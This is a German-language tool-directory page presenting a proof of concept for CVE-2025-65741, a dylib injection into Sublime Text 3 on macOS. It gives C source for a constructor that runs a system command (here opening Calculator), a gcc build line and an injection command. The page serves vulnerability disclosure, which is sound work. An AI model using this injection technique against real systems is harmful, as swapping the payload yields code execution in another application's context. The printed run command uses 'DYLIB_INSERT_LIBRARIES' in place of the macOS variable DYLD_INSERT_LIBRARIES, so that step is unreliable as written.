Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-65741 — Proof-of-Concept für CVE-2025-65741, der dylib Injection in Sublime Text 3 auf macOS über unsignierten Code demonstriert, mit einer kompilierten .dylib Payload und Exploitation-Schritten. | Kitploit
Tools/GitHubGitHub/vinicius-batistella/cve-2025-65741
SchwachstellenanalyseCode-AnalyseExploitationPayload-EntwicklungBinary-Exploitation
GitHubvinicius-batistella/cve-2025-65741

CVE-2025-65741

Proof-of-Concept für CVE-2025-65741, der dylib Injection in Sublime Text 3 auf macOS über unsignierten Code demonstriert, mit einer kompilierten .dylib Payload und Exploitation-Schritten.

Repository anzeigen
24vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-65741 - Sublime Text 3 anfällig für Dylib-Injection unter macOS

Download: https://www.sublimetext.com/3
CVE: CVE-2025-65741 | https://nvd.nist.gov/vuln/detail/CVE-2025-65741
Author: Vinicius Batistella
Version Affected: Sublime Text 3 Build 3208 oder früher für macOS

Details

Die Sublime Text-App überprüft eine unsignierte Code-Injection nicht korrekt, was es einem Angreifer ermöglicht, eine .dylib-Bibliothek zu kompilieren und die App zu zwingen, diese im Kontext der Anwendung auszuführen. Im folgenden Beispiel wurde die Sublime Text-App gezwungen, die calc-Binärdatei zu öffnen. Diese Sicherheitslücke wurde in Build 3209 und später behoben.

image

PoC

  1. Kompilieren Sie den folgenden C-Code wie folgt:
#include <stdio.h>
#include <stdlib.h>

__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
	printf("[+] Dynalic Library Injection: %s\n", argv[0]);
	system("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
}
gcc -dynamiclib injection.c -arch x86_64 -o injection_x86.dylib
  1. Führen Sie ihn dann gegen ein Sublime Text 3 Build 3208 oder älter wie folgt aus:
DYLIB_INSERT_LIBRARIES=injection_x86.dylib /Applications/Sublime\ Text.app/Contents/MacOS/Sublime\ Text
Tool herunterladen